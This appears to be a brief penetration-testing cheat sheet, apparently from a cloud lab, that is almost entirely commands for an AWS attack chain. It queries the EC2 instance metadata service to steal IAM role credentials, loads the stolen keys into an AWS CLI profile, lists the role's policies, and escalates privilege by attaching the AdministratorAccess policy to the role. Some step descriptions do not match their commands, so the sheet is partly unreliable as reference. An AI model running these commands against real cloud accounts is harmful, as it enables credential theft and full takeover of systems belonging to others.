SSRF / RCE

SSRF

AWS

AWS

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/jump-ec2-role

aws configure set aws_access_key_id [key-id] --profile ec2
aws configure set aws_secret_access_key [key-id] --profile ec2
aws configure set aws_session_token [token] --profile ec2
aws sts get-caller-identity --profile ec2

Get the Managed Policy Attached to EC2 Instance :

 aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy --profile auditor

Retrieves the specified inline policy document that is embedded on the ec2 instance role :

aws iam list-role-policies --role-name jump-ec2-role --profile auditor

Get the permissions in inline policy :

aws iam get-role-policy --role-name jump-ec2-role --policy-name jump-inline-policy --profile auditor

Escalate privilege by attaching administrator policy to itself :

aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name jump-ec2-role --profile ec2